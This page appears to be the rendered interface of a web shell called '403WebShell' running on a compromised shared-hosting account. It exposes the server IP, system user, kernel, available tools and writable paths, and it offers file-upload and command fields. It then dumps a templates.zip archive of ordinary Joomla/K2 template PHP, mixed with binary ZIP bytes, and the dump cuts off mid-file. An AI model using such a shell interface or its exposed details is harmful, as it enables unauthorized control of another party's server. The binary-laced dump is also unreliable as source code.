Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.217.35
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/123click/assets/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/123click/assets/templates.zip
PK!���}}bizone/html/pagination.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/**
 * This is a file to add template specific chrome to pagination rendering.
 *
 * pagination_list_footer
 * 	Input variable $list is an array with offsets:
 * 		$list[limit]		: int
 * 		$list[limitstart]	: int
 * 		$list[total]		: int
 * 		$list[limitfield]	: string
 * 		$list[pagescounter]	: string
 * 		$list[pageslinks]	: string
 *
 * pagination_list_render
 * 	Input variable $list is an array with offsets:
 * 		$list[all]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[start]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[previous]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[next]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[end]
 * 			[data]		: string
 * 			[active]	: boolean
 * 		$list[pages]
 * 			[{PAGE}][data]		: string
 * 			[{PAGE}][active]	: boolean
 *
 * pagination_item_active
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * pagination_item_inactive
 * 	Input variable $item is an object with fields:
 * 		$item->base	: integer
 * 		$item->link	: string
 * 		$item->text	: string
 *
 * This gives template designers ultimate control over how pagination is rendered.
 *
 * NOTE: If you override pagination_item_active OR pagination_item_inactive you MUST override them both
 */

/**
 * Renders the pagination footer
 *
 * @param   array   $list  Array containing pagination footer
 *
 * @return  string         HTML markup for the full pagination footer
 *
 * @since   3.0
 */
function pagination_list_footer($list)
{
	$html = "<div class=\"pagination\">\n";
	$html .= $list['pageslinks'];
	$html .= "\n<input type=\"hidden\" name=\"" . $list['prefix'] . "limitstart\" value=\"" . $list['limitstart'] . "\" />";
	$html .= "\n</div>";

	return $html;
}

/**
 * Renders the pagination list
 *
 * @param   array   $list  Array containing pagination information
 *
 * @return  string         HTML markup for the full pagination object
 *
 * @since   3.0
 */
function pagination_list_render($list)
{
	// Calculate to display range of pages
	$currentPage = 1;
	$range = 1;
	$step = 5;
	foreach ($list['pages'] as $k => $page)
	{
		if (!$page['active'])
		{
			$currentPage = $k;
		}
	}
	if ($currentPage >= $step)
	{
		if ($currentPage % $step == 0)
		{
			$range = ceil($currentPage / $step) + 1;
		}
		else
		{
			$range = ceil($currentPage / $step);
		}
	}

	$html = '<ul class="pagination-list pagination">';
	$html .= $list['start']['data'];
	$html .= $list['previous']['data'];

	foreach ($list['pages'] as $k => $page)
	{
		if (in_array($k, range($range * $step - ($step + 1), $range * $step)))
		{
			if (($k % $step == 0 || $k == $range * $step - ($step + 1)) && $k != $currentPage && $k != $range * $step - $step)
			{
				$page['data'] = preg_replace('#(<a.*?>).*?(</a>)#', '$1...$2', $page['data']);
			}
		}

		$html .= $page['data'];
	}

	$html .= $list['next']['data'];
	$html .= $list['end']['data'];

	$html .= '</ul>';
	return $html;
}

/**
 * Renders an active item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string                    HTML markup for active item
 *
 * @since   3.0
 */
function pagination_item_active(&$item)
{
	$class = '';

	// Check for "Start" item
	if ($item->text == JText::_('JLIB_HTML_START'))
	{
		$display = '<i class="fa fa-angle-double-left"></i>';
	}

	// Check for "Prev" item
	if ($item->text == JText::_('JPREV'))
	{
		$display = '<i class="fa fa-long-arrow-left"></i>' .JText::_('JPREV');
		$class   = ' class="morepost pull-left"';
	}

	// Check for "Next" item
	if ($item->text == JText::_('JNEXT'))
	{
		$display = JText::_('JNEXT') .' <i class="fa fa-long-arrow-right"></i>';
		$class   = ' class="morepost pull-right"';
	}

	// Check for "End" item
	if ($item->text == JText::_('JLIB_HTML_END'))
	{
		$display = '<i class="fa fa-angle-double-right"></i>';
	}

	// If the display object isn't set already, just render the item with its text
	if (!isset($display))
	{
		$display = $item->text;
		$class   = ' class="hidden-phone"';
	}

	return '<li' . $class . '><a title="' . $item->text . '" href="' . $item->link . '" class="pagenav">' . $display . '</a></li>';
}

/**
 * Renders an inactive item in the pagination block
 *
 * @param   JPaginationObject  $item  The current pagination object
 *
 * @return  string  HTML markup for inactive item
 *
 * @since   3.0
 */
function pagination_item_inactive(&$item)
{
	// Check for "Start" item
	if ($item->text == JText::_('JLIB_HTML_START'))
	{
		return '<li class="disabled"><a><i class="icon-first"></i></a></li>';
	}

	// Check for "Prev" item
	if ($item->text == JText::_('JPREV'))
	{
		return '<li class="disabled morepost pull-left"><a><i class="fa fa-long-arrow-left"></i>' .JText::_('JPREV') .'</a></li>';
	}

	// Check for "Next" item
	if ($item->text == JText::_('JNEXT'))
	{
		return '<li class="disabled morepost pull-right"><a>' .JText::_('JNEXT') .'<i class="imorepost pull-right"></i></a></li>';
	}

	// Check for "End" item
	if ($item->text == JText::_('JLIB_HTML_END'))
	{
		return '<li class="disabled"><a><i class="icon-last"></i></a></li>';
	}

	// Check if the item is the active page
	if (isset($item->active) && ($item->active))
	{
		return '<li class="active hidden-phone"><a>' . $item->text . '</a></li>';
	}

	// Doesn't match any other condition, render a normal item
	return '<li class="disabled hidden-phone"><a>' . $item->text . '</a></li>';
}
PK!��h��1bizone/html/com_blue_pagebuilder/page/default.phpnu�[���<?php
/**
 * @package     Joomla.Administrator
 * @subpackage  com_BLUE_PAGEBUILDER
 *
 * @copyright   Copyright (C) 2005 - 2013 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;
// check sidebar
$checksidebar = JFactory::getApplication()->getTemplate(true)->params->get('type');
?>
<?php if($this->itemConfig->id!="") echo "<section id='{$this->itemConfig->id}'>"; ?>
<?php if($this->itemConfig->class!="") echo "<div class='{$this->itemConfig->class}'>"; ?>
<?php if($this->itemConfig->fullwidth!="1" && !$checksidebar) echo '<div class="container">'; ?>
<?php echo do_shortcode($this->item->code); ?>
<?php if(!$this->itemConfig->fullwidth && !$checksidebar) echo '</div>'; ?>
<?php if($this->itemConfig->class!="") echo "</div>"; ?>
<?php if($this->itemConfig->id!="") echo "</section>"; ?>
PK!\9�l��1bizone/html/layouts/com_contact/fields/render.phpnu�[���<?php
/**
 * @package     Joomla.Site
 * @subpackage  com_contact
 *
 * @copyright   Copyright (C) 2005 - 2019 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */
defined('_JEXEC') or die;

// Check if we have all the data
if (!key_exists('item', $displayData) || !key_exists('context', $displayData))
{
	return;
}

// Setting up for display
$item = $displayData['item'];

if (!$item)
{
	return;
}

$context = $displayData['context'];

if (!$context)
{
	return;
}

JLoader::register('FieldsHelper', JPATH_ADMINISTRATOR . '/components/com_fields/helpers/fields.php');

$parts     = explode('.', $context);
$component = $parts[0];
$fields    = null;

if (key_exists('fields', $displayData))
{
	$fields = $displayData['fields'];
}
else
{
	$fields = $item->jcfields ?: FieldsHelper::getFields($context, $item, true);
}

if (!$fields)
{
	return;
}

// Check if we have mail context in first element
$isMail = (reset($fields)->context == 'com_contact.mail');

if (!$isMail)
{
	// Print the container tag
	echo '<dl class="fields-container contact-fields dl-horizontal">';
}

// Loop through the fields and print them
foreach ($fields as $field)
{
	// If the value is empty do nothing
	if (!strlen($field->value) && !$isMail)
	{
		continue;
	}

	$layout = $field->params->get('layout', 'render');
	echo FieldsHelper::render($context, 'field.' . $layout, array('field' => $field));
}

if (!$isMail)
{
	// Close the container
	echo '</dl>';
}

PK!�T+~~'bizone/html/mod_breadcrumbs/default.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  mod_breadcrumbs
 *
 * @copyright   Copyright (C) 2005 - 2016 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

JHtml::_('bootstrap.tooltip');
?>

	<?php
	// Get rid of duplicated entries on trail including home page when using multilanguage
	for ($i = 0; $i < $count; $i++)
	{
		if ($i == 1 && !empty($list[$i]->link) && !empty($list[$i - 1]->link) && $list[$i]->link == $list[$i - 1]->link)
		{
			unset($list[$i]);
		}
	}

	// Find last and penultimate items in breadcrumbs list
	end($list);
	$last_item_key = key($list);
	prev($list);
	$penult_item_key = key($list);

	// Make a link if not the last item in the breadcrumbs
	$show_last = $params->get('showLast', 1);

	// Generate the trail
	foreach ($list as $key => $item) :
		if ($key != $last_item_key) :
			// Render all but last item - along with separator ?>
			<?php if (!empty($item->link)) : ?>
				<a href="<?php echo $item->link; ?>"><i class="fa fa-circle"></i><?php echo $item->name; ?></a>
			<?php else : ?>
				<a href="#."><i class="fa fa-circle"></i><?php echo $item->name; ?></a>
			<?php endif; ?>
		<?php elseif ($show_last) :
			// Render last item if reqd. ?>

			<span><i class="fa fa-angle-right"></i><?php echo $item->name; ?></span>
		<?php endif;
	endforeach; ?>PK!߄�B  bizone/html/index.htmlnu&1i�<!DOCTYPE html><title></title>
PK!��<V��'bizone/html/mod_k2_tools/categories.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2CategoriesListBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
	<?php echo $output; ?>
</div>
PK!��$bizone/html/mod_k2_tools/authors.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2AuthorsListBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
  <ul>
    <?php foreach ($authors as $author): ?>
    <li>
      <?php if ($params->get('authorAvatar')): ?>
      <a class="k2Avatar abAuthorAvatar" rel="author" href="<?php echo $author->link; ?>" title="<?php echo K2HelperUtilities::cleanHtml($author->name); ?>">
      	<img src="<?php echo $author->avatar; ?>" alt="<?php echo K2HelperUtilities::cleanHtml($author->name); ?>" style="width:<?php echo $avatarWidth; ?>px;height:auto;" />
      </a>
      <?php endif; ?>

      <a class="abAuthorName" rel="author" href="<?php echo $author->link; ?>">
      	<?php echo $author->name; ?>

      	<?php if ($params->get('authorItemsCounter')): ?>
      	<span>(<?php echo $author->items; ?>)</span>
      	<?php endif; ?>
      </a>

      <?php if ($params->get('authorLatestItem')): ?>
      <a class="abAuthorLatestItem" href="<?php echo $author->latest->link; ?>" title="<?php echo K2HelperUtilities::cleanHtml($author->latest->title); ?>">
      	<?php echo $author->latest->title; ?>
	      <span class="abAuthorCommentsCount">
	      	(<?php echo $author->latest->numOfComments; ?> <?php if($author->latest->numOfComments=='1') echo JText::_('K2_MODK2TOOLS_COMMENT'); else echo JText::_('K2_MODK2TOOLS_COMMENTS'); ?>)
	      </span>
      </a>
      <?php endif; ?>
    </li>
    <?php endforeach; ?>
  </ul>
</div>
PK!�Q�S%bizone/html/mod_k2_tools/calendar.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2CalendarBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
	<?php echo $calendar; ?>
	<div class="clr"></div>
</div>
PK!�L��}}#bizone/html/mod_k2_tools/search.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

/*
Important note:
If you wish to use the live search option, it's important that you maintain the same class names for wrapping elements, e.g. the wrapping div and form.
*/

?>
<div id="search" class="k2SearchBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); if($params->get('liveSearch')) echo ' k2LiveSearchBlock'; ?>">
	<button type="button" class="close">×</button>
	<form action="<?php echo $action; ?>" method="get" autocomplete="off" class="k2SearchBlockForm">

		<input type="text" value="<?php echo $text; ?>" name="searchword" maxlength="500" size="<?php echo $width; ?>" alt="<?php echo $button_text; ?>" class="inputbox" onblur="if(this.value=='') this.value='<?php echo $text; ?>';" onfocus="if(this.value=='<?php echo $text; ?>') this.value='';" />

		<?php if($button): ?>
		<?php if($imagebutton): ?>
		<input type="image" value="<?php echo $button_text; ?>" class="button" onclick="this.form.searchword.focus();" src="<?php echo JURI::base(true); ?>/components/com_k2/images/fugue/search.png" />
		<?php else: ?>
		<button type="submit" class="btn btn-primary"><?php echo $button_text; ?></button>
		<?php endif; ?>
		<?php endif; ?>
		<?php if($categoryFilter): ?>
		<input type="hidden" name="categories" value="<?php echo $categoryFilter; ?>" />
		<?php endif; ?>
		<?php if(!$app->getCfg('sef')): ?>
		<input type="hidden" name="option" value="com_k2" />
		<input type="hidden" name="view" value="itemlist" />
		<input type="hidden" name="task" value="search" />
		<?php endif; ?>
		<?php if($params->get('liveSearch')): ?>
		<input type="hidden" name="format" value="html" />
		<input type="hidden" name="t" value="" />
		<input type="hidden" name="tpl" value="search" />
		<?php endif; ?>
	</form>

	<?php if($params->get('liveSearch')): ?>
	<div class="k2LiveSearchResults"></div>
	<?php endif; ?>
</div>
PK!��U%��(bizone/html/mod_k2_tools/breadcrumbs.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2BreadcrumbsBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
	<?php
	$output = '';
	if ($params->get('home')) {
		$output .= '<span class="bcTitle">'.JText::_('K2_YOU_ARE_HERE').'</span>';
		$output .= '<a href="'.JURI::root().'">'.$params->get('home',JText::_('K2_HOME')).'</a>';
		if (count($path)) {
			foreach ($path as $link) {
				$output .= '<span class="bcSeparator">'.$params->get('seperator','&raquo;').'</span>'.$link;
			}
		}
		if($title){
			$output .= '<span class="bcSeparator">'.$params->get('seperator','&raquo;').'</span>'.$title;
		}
	} else {
		if($title){
			$output .= '<span class="bcTitle">'.JText::_('K2_YOU_ARE_HERE').'</span>';
		}
		if (count($path)) {
			foreach ($path as $link) {
				$output .= $link.'<span class="bcSeparator">'.$params->get('seperator','&raquo;').'</span>';
			}
		}
		$output .= $title;
	}

	echo $output;
	?>
</div>
PK!�J;rYY!bizone/html/mod_k2_tools/tags.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="tag-cloud <?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
	<ul>
	<?php foreach ($tags as $tag): ?>
	<?php if(!empty($tag->tag)): ?>
		<li><a href="<?php echo $tag->link; ?>" style="font-size:<?php echo $tag->size; ?>%" title="<?php echo $tag->count.' '.JText::_('K2_ITEMS_TAGGED_WITH').' '.K2HelperUtilities::cleanHtml($tag->tag); ?>">
			<?php echo $tag->tag; ?>
		</a></li>
	<?php endif; ?>
	<?php endforeach; ?>
	</ul>
	<div class="clr"></div>
</div>
PK!�'N$bizone/html/mod_k2_tools/archive.phpnu&1i�<?php 
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>
<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2ArchivesBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
  <ul>
    <?php foreach ($months as $month): ?>
    <li>
      <a href="<?php echo $month->link; ?>">
        <?php echo $month->name.' '.$month->y; ?>
        <?php if ($params->get('archiveItemsCounter')) echo '('.$month->numOfItems.')'; ?>
      </a>
    </li>
    <?php endforeach; ?>
  </ul>
</div>
PK!���'bizone/html/mod_k2_tools/customcode.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<div id="k2ModuleBox<?php echo $module->id; ?>" class="k2CustomCodeBlock<?php if($params->get('moduleclass_sfx')) echo ' '.$params->get('moduleclass_sfx'); ?>">
	<?php echo $customcode; ?>
</div>
PK!e���::#bizone/html/st_template/contact.phpnu&1i�<?php 
defined('_JEXEC') or die;
$doc = JFactory::getDocument();
$doc->addScript(JURI::root(true).'/plugins/system/bluetheme/assets/js/form-validation.js');
$app = JFactory::getApplication('site');
$componentParams = $app->getParams('com_blue_pagebuilder');
$style = $componentParams->get('style','1');
$params = $app->getTemplate(true)->params;
if($params->get('stateggcaptcha') == '1' && $params->get('captchasecret') && $params->get('captchasitekey')){
   $captcha = true;
}
else
    $captcha = false;
if(strtoupper(trim($sid)) == 'EN' || $sid == '1' || empty($sid)){
    $prefix_lang = '';
} else {
    $prefix_lang = '_' .strtoupper(trim($sid));
}
?>
<div class="leigie-contact <?php echo $title; ?>">
    <div class="contact-form-wrapper">
        <form name="myform" id="contact-form" class="form-inline contact-margin" action="index.php?option=com_blue_pagebuilder&amp;task=page.contact&amp;tmpl=component" enctype="multipart/form-data" method="post">        
            <div class="notifications clearfix bt-clearfix">
                <div class="alert alert-error error text-center theme_btn color1 inverse support_widget clearfix" id="fname">
                    <p style="color: red;"><?php echo JText::_('COM_BLUE_PAGEBUILDER_NAME_MUST_NOT_BE_EMPTY_TEXT' .$prefix_lang);?></p>
                </div>
                <div class="alert alert-error  error text-center theme_btn color1 inverse support_widget clearfix" id="fmail">
                    <p style="color: red;"><?php echo JText::_('COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_EMAIL_TEXT' .$prefix_lang);?></p>
                </div>
                <div class="alert alert-error  error text-center theme_btn color1 inverse support_widget clearfix" id="fsubject">
                    <p style="color: red;"><?php echo JText::_('COM_BLUE_PAGEBUILDER_PLEASE_PROVIDE_A_VALID_SUBJECT_TEXT' .$prefix_lang);?></p>
                </div>
                <div class="alert alert-error  error text-center theme_btn color1 inverse support_widget clearfix" id="fmsg">
                    <p style="color: red;"><?php echo JText::_('COM_BLUE_PAGEBUILDER_MESSAGE_SHOULD_NOT_BE_EMPTY_TEXT' .$prefix_lang);?></p>
                </div>
                <div class="alert alert-error  error text-center theme_btn color1 inverse support_widget clearfix" id="frecaptcha">
                    <p style="color: red;"><?php echo JText::_('COM_BLUE_PAGEBUILDER_CAPTCHA_NOT_VALIDATED' .$prefix_lang);?></p>
                </div>
                <div class="contact-success-message alert alert-success success text-center theme_btn inverse color3"></div>
            </div>
            <!--Name and Email Field Box-->
            <div class="row">
                <div class="col-md-6 col-sm-12 col-xs-12 form-group">
                    <input id="name" class="form-control" type="text" name="name" placeholder="<?php echo JText::_('COM_BLUE_PAGEBUILDER_YOUR_NAME_TEXT' .$prefix_lang);?>"/>
                </div>
                <div class="col-md-6 col-sm-12 col-xs-12 form-group">
                    <input id="email" class="form-control" type="text" name="email" placeholder="<?php echo JText::_('COM_BLUE_PAGEBUILDER_VALID_EMAIL_ID_TEXT' .$prefix_lang);?>"/>
                </div>
            </div>
            <div class="row">
                <div class="col-xs-12 col-md-12">
                    <textarea id="message" class="form-control"  name="message" placeholder="<?php echo JText::_('COM_BLUE_PAGEBUILDER_YOUR_MESSAGE_TEXT' .$prefix_lang);?>" ></textarea>
                </div>
            </div>

            <?php if($captcha): ?>
            <div class="row">
                <div class="col-xs-12 col-md-12">
                    <script src='https://www.google.com/recaptcha/api.js'></script>
                    <div class="g-recaptcha" data-sitekey="<?php echo $params->get('captchasitekey'); ?>"></div>
                </div>
            </div>
            <?php endif; ?>

            <div class="row">
                <div class="col-xs-12 col-md-12">
                    <button id="submit_btn" class="btn-black btn-blue bounce-green" type="submit"> <?php echo JText::_('COM_BLUE_PAGEBUILDER_BTN_SUBMIT' .$prefix_lang); ?> </button>
                </div>
            </div>

            <input type="hidden" class="thank" name="thanks" value="<?php echo (!empty($thanks)? $thanks : ''); ?>" />
            <input type="hidden" class="emailauthor" name="emailauthor" value="<?php echo (!empty($email)? $email : ''); ?>" />
            <input type="hidden" class="subject" name="subject" value="<?php echo (!empty($subject)? $subject : ''); ?>" />
        </form>
        
    </div>
</div>PK!r ���)bizone/html/st_template/blog_carousel.phpnu�[���<?php 
$app = JFactory::getApplication();
$doc = JFactory::getDocument();
$item_menu = '';
if ($menuid != '') {
	(int)$itemid = $menuid;
	$item_menu = '&amp;Itemid='.$itemid;
}
?>
<div id="publication-slider" class="owl-carousel">
	<?php if(isset($catItems) && count($catItems)) : foreach($catItems as $key=> $item): ?>
		<?php
			$image_normal = $bt->getImageK2($item->id, 'XL');
	        $link = 'index.php?option=com_k2&amp;view=item&amp;id='.$item->id.':'.$item->alias .$item_menu ;
			$total = $K2ModelItem->countItemComments($item->id);
			$date = new DateTime($item->created);
			$author = $bt->getK2Author($item->created_by);
			
		?>
		<div class="item"> 
			<img src="<?php echo $image_normal; ?>" alt="<?php echo $item->title; ?>">
			<h5>Cliquez sur le titre</h5>
			<h4><a href="<?php echo  JRoute::_($link); ?>"><?php echo $item->title; ?></a></h4>
			<p><?php echo JText::_(''); ?> <a href="<?php echo  JRoute::_($link); ?>" class="name"></a>  
			<a href="<?php echo  JRoute::_($link); ?>" class="comment"></a></p>
			<div class="introtext">
				<?php echo $item->introtext; ?>
			</div>
			<a href="<?php echo  JRoute::_($link); ?>"><?php echo JText::_('En savoir plus'); ?></a> 
        </div>
	<?php endforeach; endif; ?>
</div>PK!|E�$$/bizone/html/com_k2/templates/generic_search.phpnu&1i�<?php
/**
 * @version		2.6.x
 * @package		K2
 * @author		JoomlaWorks http://www.joomlaworks.net
 * @copyright	Copyright (c) 2006 - 2014 JoomlaWorks Ltd. All rights reserved.
 * @license		GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<?php if(count($this->items)): ?>
<ul class="liveSearchResults">
	<?php foreach($this->items as $item): ?>
	<li><a href="<?php echo $item->link; ?>"><?php echo $item->title; ?></a></li>
	<?php endforeach; ?>
</ul>
<?php endif; ?>
PK!�r��,bizone/html/com_k2/templates/default/tag.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- Start K2 Tag Layout -->
<div id="k2Container" class="tagView<?php if($this->params->get('pageclass_sfx')) echo ' '.$this->params->get('pageclass_sfx'); ?>">

	<?php if($this->params->get('show_page_title')): ?>
	<!-- Page title -->
	<div class="componentheading<?php echo $this->params->get('pageclass_sfx')?>">
		<?php echo $this->escape($this->params->get('page_title')); ?>
	</div>
	<?php endif; ?>

	<?php if($this->params->get('tagFeedIcon',1)): ?>
	<!-- RSS feed icon -->
	<div class="k2FeedIcon">
		<a href="<?php echo $this->feed; ?>" title="<?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?>">
			<span><?php echo JText::_('K2_SUBSCRIBE_TO_THIS_RSS_FEED'); ?></span>
		</a>
		<div class="clr"></div>
	</div>
	<?php endif; ?>

	<?php if(count($this->items)): ?>
	<div class="tagItemList">
		<?php foreach($this->items as $item): ?>

		<!-- Start K2 Item Layout -->
		<div class="tagItemView">

			<div class="tagItemHeader">
				<?php if($item->params->get('tagItemDateCreated',1)): ?>
				<!-- Date created -->
				<span class="tagItemDateCreated">
					<?php echo JHTML::_('date', $item->created , JText::_('K2_DATE_FORMAT_LC2')); ?>
				</span>
				<?php endif; ?>

			  <?php if($item->params->get('tagItemTitle',1)): ?>
			  <!-- Item title -->
			  <h2 class="tagItemTitle">
			  	<?php if ($item->params->get('tagItemTitleLinked',1)): ?>
					<a href="<?php echo $item->link; ?>">
			  		<?php echo $item->title; ?>
			  	</a>
			  	<?php else: ?>
			  	<?php echo $item->title; ?>
			  	<?php endif; ?>
			  </h2>
			  <?php endif; ?>
		  </div>

		  <div class="tagItemBody">
			  <?php if($item->params->get('tagItemImage',1) && !empty($item->imageGeneric)): ?>
			  <!-- Item Image -->
			  <div class="tagItemImageBlock">
				  <span class="tagItemImage">
				    <a href="<?php echo $item->link; ?>" title="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>">
				    	<img src="<?php echo $item->imageGeneric; ?>" alt="<?php if(!empty($item->image_caption)) echo K2HelperUtilities::cleanHtml($item->image_caption); else echo K2HelperUtilities::cleanHtml($item->title); ?>" style="width:<?php echo $item->params->get('itemImageGeneric'); ?>px; height:auto;" />
				    </a>
				  </span>
				  <div class="clr"></div>
			  </div>
			  <?php endif; ?>

			  <?php if($item->params->get('tagItemIntroText',1)): ?>
			  <!-- Item introtext -->
			  <div class="tagItemIntroText">
			  	<?php echo $item->introtext; ?>
			  </div>
			  <?php endif; ?>

			  <div class="clr"></div>
		  </div>

		  <div class="clr"></div>

		  <?php if($item->params->get('tagItemExtraFields',0) && count($item->extra_fields)): ?>
		  <!-- Item extra fields -->
		  <div class="tagItemExtraFields">
		  	<h4><?php echo JText::_('K2_ADDITIONAL_INFO'); ?></h4>
		  	<ul>
				<?php foreach ($item->extra_fields as $key=>$extraField): ?>
				<?php if($extraField->value != ''): ?>
				<li class="<?php echo ($key%2) ? "odd" : "even"; ?> type<?php echo ucfirst($extraField->type); ?> group<?php echo $extraField->group; ?>">
					<?php if($extraField->type == 'header'): ?>
					<h4 class="tagItemExtraFieldsHeader"><?php echo $extraField->name; ?></h4>
					<?php else: ?>
					<span class="tagItemExtraFieldsLabel"><?php echo $extraField->name; ?></span>
					<span class="tagItemExtraFieldsValue"><?php echo $extraField->value; ?></span>
					<?php endif; ?>
				</li>
				<?php endif; ?>
				<?php endforeach; ?>
				</ul>
		    <div class="clr"></div>
		  </div>
		  <?php endif; ?>

			<?php if($item->params->get('tagItemCategory')): ?>
			<!-- Item category name -->
			<div class="tagItemCategory">
				<span><?php echo JText::_('K2_PUBLISHED_IN'); ?></span>
				<a href="<?php echo $item->category->link; ?>"><?php echo $item->category->name; ?></a>
			</div>
			<?php endif; ?>

			<?php if ($item->params->get('tagItemReadMore')): ?>
			<!-- Item "read more..." link -->
			<div class="tagItemReadMore">
				<a class="k2ReadMore" href="<?php echo $item->link; ?>">
					<?php echo JText::_('K2_READ_MORE'); ?>
				</a>
			</div>
			<?php endif; ?>

			<div class="clr"></div>
		</div>
		<!-- End K2 Item Layout -->

		<?php endforeach; ?>
	</div>

	<!-- Pagination -->
	<?php if($this->pagination->getPagesLinks()): ?>
	<div class="k2Pagination">
		<?php echo $this->pagination->getPagesLinks(); ?>
		<div class="clr"></div>
		<?php echo $this->pagination->getPagesCounter(); ?>
	</div>
	<?php endif; ?>

	<?php endif; ?>

</div>
<!-- End K2 Tag Layout -->
PK!�.q��$�$1bizone/html/com_k2/templates/default/category.phpnu&1i�<?php
/**
 * @version    2.7.x
 * @package    K2
 * @author     JoomlaWorks http://www.joomlaworks.net
 * @copyright  Copyright (c) 2006 - 2016 JoomlaWorks Ltd. All rights reserved.
 * @license    GNU/GPL license: http://www.gnu.org/copyleft/gpl.html
 */

// no direct access
defined('_JEXEC') or die;

?>

<!-- Start K2 Category Layout -->
